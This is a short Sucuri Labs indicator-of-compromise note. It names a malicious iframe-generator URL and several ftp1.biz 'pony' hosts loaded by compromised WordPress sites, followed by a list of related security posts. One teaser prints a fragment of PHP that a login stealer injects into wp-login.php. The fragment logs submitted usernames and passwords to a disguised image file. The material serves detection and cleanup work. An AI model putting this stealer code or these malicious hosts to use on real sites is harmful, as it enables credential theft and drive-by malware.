Sucuri Labs

Iframes generator: http://wordpresstest2.info/1.txt

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curlor file_get_contents call to http://wordpresstest2.info/1.txt.When you visit this site, it generates random iframes:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/pony

That are displayed on the compromised sites.

Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags

Labs Note

Reflected XSS in WordPress v5.5.1 and Lower

Marc-Alexandre Montpas

October 30, 2020

WordPress released version 5.5.2 yesterday, which fixed a reflected XSS vulnerability we reported earlier this year. The root cause of this issue is a bug…

Read the Post

Spam Injector Disguised as a License Key

Moe O

January 7, 2019

A client reported some weird spam URLs injected on their WordPress website and after an investigation, it turned out that the hacker was hiding the…

Read the Post

Phishing and Malware via SMS Text Message

Krasimir Konov

March 6, 2020

We’ve recently noticed an increase in reports of phishing and malware being distributed via SMS text messages. During one investigation, we identified fake messages sent…

Read the Post

Backdoor Obfuscation: tempnam & URL Encoding

Luke Leal

September 28, 2020

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code. During a recent investigation,…

Read the Post

Simple WP login stealer

Luke Leal

July 28, 2019

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post

ThinkPHP 5.x – Remote Code Execution Actively Exploited In The Wild

John Castro

April 8, 2019

Earlier this year, we noticed an increase in attacks aiming at ThinkPHP. ThinkPHP is a PHP framework that is very popular in Asia. If you…

Read the Post

Leveraging Stored Procedures for Nefarious Purposes

Bruno Zanelato

June 19, 2019

Here at Sucuri, we clean thousands of websites on a daily basis, and while some of them are easy to solve, others may require more…

Read the Post

PHP Backdoor Obfuscated One Liner

Luke Leal

August 5, 2020

In the past, I have explained how small one line PHP backdoors use obfuscation and strings of code in HTTP requests to pass attacker’s commands…

Read the Post

Mayhem malware still on the wild

Jose Martinez

September 19, 2017

Years ago, colleagues from Yandex introduced the concept of Mayhem infections. In that post, they provided very detailed information about the malware, its functionalities and…

Read the Post

Small One-liner Backdoor

Samuel Odendaal

August 21, 2017

During an incident response investigation, we detected an interesting backdoor that was small but had the potential to give the attacker full access to your…

Read the Post

Related Tags

Related Categories

You May Also Like